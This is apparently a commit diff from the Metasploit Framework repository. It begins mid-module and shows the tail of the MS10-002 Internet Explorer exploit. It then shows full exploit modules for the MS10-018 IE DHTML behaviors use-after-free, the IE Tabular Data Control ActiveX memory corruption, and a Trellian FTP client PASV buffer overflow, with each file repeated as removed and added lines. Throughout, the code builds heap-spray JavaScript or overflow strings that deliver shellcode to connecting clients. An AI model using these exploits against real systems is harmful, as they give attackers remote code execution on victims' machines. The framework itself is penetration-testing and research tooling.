p = "\\u0c0f\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
for (i = 0; i < #{var_el_array}.length; i++)
{
#{var_el_array}[i].data = p;
}
var t = #{var_event}.srcElement;
}
</script>
</head>
<body>
<span id="#{var_span_id}"><iframe src="#{get_resource}#{var_start}.gif" onload="#{var_loaded}(event)" /></span></body></html>
</body>
</html>|
print_status("Sending #{self.name} to client #{cli.peerhost}")
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
# Handle the payload
handler(cli)
end
'unknown',
'hdm' # Metasploit port
],
'Version' => '$Revision$',
'References' =>
[
['MSB', 'MS10-002'],
['CVE', '2010-0249'],
['OSVDB', '61697'],
['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'Compat' =>
{
'ConnectionType' => '-find',
},
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { }],
],
'DisclosureDate' => 'Jan 14 2009', # wepawet sample
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
if (request.uri.match(/\.gif/i))
data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
send_response(cli, data, { 'Content-Type' => 'image/gif' })
return
end
var_boom = rand_text_alpha(rand(100) + 1)
var_element = rand_text_alpha(rand(100) + 1)
var_event = rand_text_alpha(rand(100) + 1)
var_loaded = rand_text_alpha(rand(100) + 1)
var_loaded_arg = rand_text_alpha(rand(100) + 1)
var_memory = rand_text_alpha(rand(100) + 1)
var_spray = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(100) + 1)
var_el_array = rand_text_alpha(rand(100) + 1)
bleh = rand_text_alpha(3);
var_grab_mem = rand_text_alpha(rand(100) + 1)
var_unescape = rand_text_alpha(rand(100) + 1)
var_shellcode = rand_text_alpha(rand(100) + 1)
var_span_id = rand_text_alpha(rand(100) + 1)
var_start = rand_text_alpha(rand(100) + 1)
rand_html = rand_text_english(rand(400) + 500)
html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
var #{var_element} = "COMMENT";
var #{var_el_array} = new Array();
for (i = 0; i < 1300; i++)
{
#{var_el_array}[i] = document.createElement(#{var_element});
#{var_el_array}[i].data = "#{bleh}";
}
var #{var_event} = null;
var #{var_memory} = new Array();
var #{var_unescape} = unescape;
function #{var_boom}()
{
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
}
function #{var_loaded}(#{var_loaded_arg})
{
#{var_boom}();
#{var_event} = document.createEventObject(#{var_loaded_arg});
document.getElementById("#{var_span_id}").innerHTML = "";
window.setInterval(#{var_grab_mem}, 50);
}
function #{var_grab_mem}()
{
p = "\\u0c0f\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
for (i = 0; i < #{var_el_array}.length; i++)
{
#{var_el_array}[i].data = p;
}
var t = #{var_event}.srcElement;
}
</script>
</head>
<body>
<span id="#{var_span_id}"><iframe src="#{get_resource}#{var_start}.gif" onload="#{var_loaded}(event)" /></span></body></html>
</body>
</html>|
print_status("Sending #{self.name} to client #{cli.peerhost}")
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
# Handle the payload
handler(cli)
end
end

500
modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
View File

@ -1,252 +1,252 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# originally ie_iepeers_pointer.rb
#
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
# - Microsoft Internet Explorer 7, Windows Vista SP2
# - Microsoft Internet Explorer 7, Windows XP SP3
# - Microsoft Internet Explorer 6, Windows XP SP3
#
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
#
# Trancer
# http://www.rec-sec.com
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer DHTML Behaviors Use After Free',
'Description' => %q{
This module exploits a use-after-free vulnerability within the DHTML behaviors
functionality of Microsoft Internet Explorer versions 6 and 7. This bug was
discovered being used in-the-wild and was previously known as the "iepeers"
vulnerability. The name comes from Microsoft's suggested workaround to block
access to the iepeers.dll file.
According to Nico Waisman, "The bug itself is when trying to persist an object
using the setAttribute, which end up calling VariantChangeTypeEx with both the
source and the destination being the same variant. So if you send as a variant
an IDISPATCH the algorithm will try to do a VariantClear of the destination before
using it. This will end up on a call to PlainRelease which deref the reference
and clean the object."
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown', # original discovery
'Trancer <mtrancer[at]gmail.com>', # metasploit module
'Nanika', # HIT2010 IE7 reliable PoC
'jduck' # minor cleanups
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-0806' ],
[ 'OSVDB', '62810' ],
[ 'BID', '38615' ],
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ],
[ 'URL', 'http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html' ],
[ 'MSB', 'MS10-018' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',
{
'Method' => 'automatic'
}
],
[ 'IE 6 SP0-SP2 (onclick)',
{
'Method' => 'onclick',
'Ret' => 0x0C0C0C0C
}
],
# "A great celebration of HIT2010" - http://www.hitcon.org/
[ 'IE 7.0 (marquee)',
{
'Method' => 'marquee',
'Ret' => 0x0C0C0C0C
}
],
],
'DisclosureDate' => 'Mar 09 2010',
'DefaultTarget' => 0))
end
def auto_target(cli, request)
mytarget = nil
agent = request.headers['User-Agent']
#print_status("Checking user agent: #{agent}")
if agent =~ /Windows NT 6\.0/
mytarget = targets[2] # IE7 on Vista
elsif agent =~ /MSIE 7\.0/
mytarget = targets[2] # IE7 on XP and 2003
elsif agent =~ /MSIE 6\.0/
mytarget = targets[1] # IE6 on NT, 2000, XP and 2003
else
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
end
mytarget
end
def on_request_uri(cli, request)
if target['Method'] == 'automatic'
mytarget = auto_target(cli, request)
if (not mytarget)
send_not_found(cli)
return
end
else
mytarget = target
end
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
# Set the return\nops
ret = Rex::Text.to_unescape([mytarget.ret].pack('V'))
# Randomize the javascript variable names
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
j_array = rand_text_alpha(rand(100) + 1)
j_function1 = rand_text_alpha(rand(100) + 1)
j_function2 = rand_text_alpha(rand(100) + 1)
j_object = rand_text_alpha(rand(100) + 1)
j_id = rand_text_alpha(rand(100) + 1)
# Construct the final page
case mytarget['Method']
when 'onclick'
html = %Q|<html><body>
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
<script language='javascript'>
function #{j_function1}(){
var #{j_shellcode} = unescape('#{shellcode}');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape('#{ret}');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}(){
#{j_function1}();
var #{j_object} = document.createElement('body');
#{j_object}.addBehavior('#default#userData');
document.appendChild(#{j_object});
try {
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
#{j_object}.setAttribute('s',window);
}
} catch(e){ }
window.status+='';
}
document.getElementById('#{j_id}').onclick();
</script></body></html>
|
when 'marquee'
j_attrib = rand_text_alpha(6);
html = %Q|<html>
<head>
<style type="text/css">
.#{j_object} {behavior: url(#default#userData);}
</style>
</head>
<script>
function #{j_function1}(){
var #{j_shellcode} = unescape('#{shellcode}');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape('#{ret}');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}() {
#{j_function1}();
for (#{j_counter} = 1; #{j_counter} <10; #{j_counter} ++ ){
#{j_id}.setAttribute("#{j_attrib}",document.location);
}
#{j_id}.setAttribute("#{j_attrib}",document.getElementsByName("style"));
document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank";
}
</script>
<body onload="#{j_function2}();"></body>
<MARQUEE id="#{j_id}" class="#{j_object}"></MARQUEE>
</html>
|
end
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# originally ie_iepeers_pointer.rb
#
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
# - Microsoft Internet Explorer 7, Windows Vista SP2
# - Microsoft Internet Explorer 7, Windows XP SP3
# - Microsoft Internet Explorer 6, Windows XP SP3
#
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
#
# Trancer
# http://www.rec-sec.com
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer DHTML Behaviors Use After Free',
'Description' => %q{
This module exploits a use-after-free vulnerability within the DHTML behaviors
functionality of Microsoft Internet Explorer versions 6 and 7. This bug was
discovered being used in-the-wild and was previously known as the "iepeers"
vulnerability. The name comes from Microsoft's suggested workaround to block
access to the iepeers.dll file.
According to Nico Waisman, "The bug itself is when trying to persist an object
using the setAttribute, which end up calling VariantChangeTypeEx with both the
source and the destination being the same variant. So if you send as a variant
an IDISPATCH the algorithm will try to do a VariantClear of the destination before
using it. This will end up on a call to PlainRelease which deref the reference
and clean the object."
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown', # original discovery
'Trancer <mtrancer[at]gmail.com>', # metasploit module
'Nanika', # HIT2010 IE7 reliable PoC
'jduck' # minor cleanups
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-0806' ],
[ 'OSVDB', '62810' ],
[ 'BID', '38615' ],
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ],
[ 'URL', 'http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html' ],
[ 'MSB', 'MS10-018' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',
{
'Method' => 'automatic'
}
],
[ 'IE 6 SP0-SP2 (onclick)',
{
'Method' => 'onclick',
'Ret' => 0x0C0C0C0C
}
],
# "A great celebration of HIT2010" - http://www.hitcon.org/
[ 'IE 7.0 (marquee)',
{
'Method' => 'marquee',
'Ret' => 0x0C0C0C0C
}
],
],
'DisclosureDate' => 'Mar 09 2010',
'DefaultTarget' => 0))
end
def auto_target(cli, request)
mytarget = nil
agent = request.headers['User-Agent']
#print_status("Checking user agent: #{agent}")
if agent =~ /Windows NT 6\.0/
mytarget = targets[2] # IE7 on Vista
elsif agent =~ /MSIE 7\.0/
mytarget = targets[2] # IE7 on XP and 2003
elsif agent =~ /MSIE 6\.0/
mytarget = targets[1] # IE6 on NT, 2000, XP and 2003
else
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
end
mytarget
end
def on_request_uri(cli, request)
if target['Method'] == 'automatic'
mytarget = auto_target(cli, request)
if (not mytarget)
send_not_found(cli)
return
end
else
mytarget = target
end
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
# Set the return\nops
ret = Rex::Text.to_unescape([mytarget.ret].pack('V'))
# Randomize the javascript variable names
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
j_array = rand_text_alpha(rand(100) + 1)
j_function1 = rand_text_alpha(rand(100) + 1)
j_function2 = rand_text_alpha(rand(100) + 1)
j_object = rand_text_alpha(rand(100) + 1)
j_id = rand_text_alpha(rand(100) + 1)
# Construct the final page
case mytarget['Method']
when 'onclick'
html = %Q|<html><body>
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
<script language='javascript'>
function #{j_function1}(){
var #{j_shellcode} = unescape('#{shellcode}');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape('#{ret}');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}(){
#{j_function1}();
var #{j_object} = document.createElement('body');
#{j_object}.addBehavior('#default#userData');
document.appendChild(#{j_object});
try {
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
#{j_object}.setAttribute('s',window);
}
} catch(e){ }
window.status+='';
}
document.getElementById('#{j_id}').onclick();
</script></body></html>
|
when 'marquee'
j_attrib = rand_text_alpha(6);
html = %Q|<html>
<head>
<style type="text/css">
.#{j_object} {behavior: url(#default#userData);}
</style>
</head>
<script>
function #{j_function1}(){
var #{j_shellcode} = unescape('#{shellcode}');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape('#{ret}');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}() {
#{j_function1}();
for (#{j_counter} = 1; #{j_counter} <10; #{j_counter} ++ ){
#{j_id}.setAttribute("#{j_attrib}",document.location);
}
#{j_id}.setAttribute("#{j_attrib}",document.getElementsByName("style"));
document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank";
}
</script>
<body onload="#{j_function2}();"></body>
<MARQUEE id="#{j_id}" class="#{j_object}"></MARQUEE>
</html>
|
end
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
end

246
modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb
View File

@ -1,123 +1,123 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer Tabular Data Control ActiveX Memory Corruption',
'Description' => %q{
This module exploits a memory corruption vulnerability in the Internet Explorer
Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet
Explorer are vulnerable.
By specifying a long value as the "DataURL" parameter to this control, it is possible
to write a NUL byte outside the bounds of an array. By targeting control flow data
on the stack, an attacker can execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Anonymous', # original discovery
'jduck' # metasploit version
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-0805' ],
[ 'OSVDB', '63329' ],
[ 'BID', '39025' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-034' ],
[ 'MSB', 'MS10-018' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "", #"\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic (Heap Spray)',
{
'Ret' => 0x0c0c0c0c
}
],
],
'DisclosureDate' => 'Mar 09 2010',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{target.name})...")
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Set the return\nops
ret = Rex::Text.to_unescape([target.ret].pack('V'))
# ActiveX parameters
#progid =
clsid = "333C7BC4-460F-11D0-BC04-0080C7055A83"
# exploit url
url = "http://"
#url << rand_text_alphanumeric(258)
url << rand_text_alphanumeric(258+0x116+2)
# Construct the final page
var_unescape = rand_text_alpha(rand(100) + 1)
var_shellcode = rand_text_alpha(rand(100) + 1)
var_memory = rand_text_alpha(rand(100) + 1)
var_spray = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(100) + 1)
html = %Q|<html><body>
<script>
var #{var_memory} = new Array();
var #{var_unescape} = unescape;
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
var #{var_spray} = #{var_unescape}("#{ret * 2}");
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0x4000 );
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
</script>
<object classid='clsid:#{clsid}'>
<param name='DataURL' value='#{url}'/>
</object>
</body></html>
|
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer Tabular Data Control ActiveX Memory Corruption',
'Description' => %q{
This module exploits a memory corruption vulnerability in the Internet Explorer
Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet
Explorer are vulnerable.
By specifying a long value as the "DataURL" parameter to this control, it is possible
to write a NUL byte outside the bounds of an array. By targeting control flow data
on the stack, an attacker can execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Anonymous', # original discovery
'jduck' # metasploit version
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-0805' ],
[ 'OSVDB', '63329' ],
[ 'BID', '39025' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-034' ],
[ 'MSB', 'MS10-018' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "", #"\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic (Heap Spray)',
{
'Ret' => 0x0c0c0c0c
}
],
],
'DisclosureDate' => 'Mar 09 2010',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{target.name})...")
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Set the return\nops
ret = Rex::Text.to_unescape([target.ret].pack('V'))
# ActiveX parameters
#progid =
clsid = "333C7BC4-460F-11D0-BC04-0080C7055A83"
# exploit url
url = "http://"
#url << rand_text_alphanumeric(258)
url << rand_text_alphanumeric(258+0x116+2)
# Construct the final page
var_unescape = rand_text_alpha(rand(100) + 1)
var_shellcode = rand_text_alpha(rand(100) + 1)
var_memory = rand_text_alpha(rand(100) + 1)
var_spray = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(100) + 1)
html = %Q|<html><body>
<script>
var #{var_memory} = new Array();
var #{var_unescape} = unescape;
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
var #{var_spray} = #{var_unescape}("#{ret * 2}");
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0x4000 );
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
</script>
<object classid='clsid:#{clsid}'>
<param name='DataURL' value='#{url}'/>
</object>
</body></html>
|
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
end

186
modules/exploits/windows/ftp/trellian_client_pasv.rb
View File

@ -1,93 +1,93 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered
through an excessively long PASV message.
},
'Author' =>
[
'zombiefx', # Original exploit author
'dookie' # MSF module author
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/12152' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 900,
'BadChars' => "\x00\x29\x2c\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Universal', { 'Ret' => "\xfd\x21\x40" } ], # 0x004021fd p/p/r in ftp.exe
],
'Privileged' => false,
'DisclosureDate' => 'April 11 2010',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
], self.class)
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
# Let the client log in
client.get_once
user = "331 Please specify the password.\r\n"
client.put(user)
client.get_once
pass = "230 Login successful.\r\n"
client.put(pass)
# Handle the clients PWD command
client.get_once
pwd = "257 \"/\" is current directory.\r\n"
client.put(pwd)
client.get_once
sploit = "227 Entering Passive Mode ("
sploit << rand_text_alpha_upper(2171)
sploit << make_nops(100)
sploit << payload.encoded
sploit << make_nops(900 - (payload.encoded.length))
sploit << "\xe9\x18\xfc\xff\xff" # Jump back 1000 bytes
sploit << "\xeb\xf9\x90\x90" # Jump back 7 bytes
sploit << [target.ret].pack("A3")
sploit << ")\r\n"
client.put(sploit)
end
end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered
through an excessively long PASV message.
},
'Author' =>
[
'zombiefx', # Original exploit author
'dookie' # MSF module author
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/12152' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 900,
'BadChars' => "\x00\x29\x2c\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Universal', { 'Ret' => "\xfd\x21\x40" } ], # 0x004021fd p/p/r in ftp.exe
],
'Privileged' => false,
'DisclosureDate' => 'April 11 2010',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
], self.class)
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
# Let the client log in
client.get_once
user = "331 Please specify the password.\r\n"
client.put(user)
client.get_once
pass = "230 Login successful.\r\n"
client.put(pass)
# Handle the clients PWD command
client.get_once
pwd = "257 \"/\" is current directory.\r\n"
client.put(pwd)
client.get_once
sploit = "227 Entering Passive Mode ("
sploit << rand_text_alpha_upper(2171)
sploit << make_nops(100)
sploit << payload.encoded
sploit << make_nops(900 - (payload.encoded.length))
sploit << "\xe9\x18\xfc\xff\xff" # Jump back 1000 bytes
sploit << "\xeb\xf9\x90\x90" # Jump back 7 bytes
sploit << [target.ret].pack("A3")
sploit << ")\r\n"
client.put(sploit)
end
end

998
tools/msfcrawler.rb
View File

File diff suppressed because it is too large Load Diff